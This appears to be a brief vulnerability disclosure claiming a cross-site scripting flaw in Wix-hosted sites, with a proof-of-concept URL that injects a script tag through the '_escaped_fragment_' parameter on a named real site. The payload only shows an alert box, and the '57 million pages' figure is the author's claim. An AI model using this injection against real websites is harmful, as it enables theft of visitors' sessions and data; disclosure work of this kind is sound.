57 million web pages are affected by a security problem in wix.com

Proof of concept of a web page made in wix.com:
http://www.itsec.cl/

to see the source code can observe the following:

...
Find the SEO content of this site's homepage via 
http://www.itsec.cl/?_escaped_fragment_=
(That is where search engines like Google go to read your homepage's 
content.)
...

tried to access an existing section and added a third invalid parameter, 
after that launched the attack code:

Valid URL:
http://www.itsec.cl/?_escaped_fragment_=partners/c1ryi/

XSS URL:
http://www.itsec.cl/?_escaped_fragment_=partners/c1ryi/x"><script>alert('xss')</script>

How cheap is expensive.


/Devsec, Security Departament. Chile./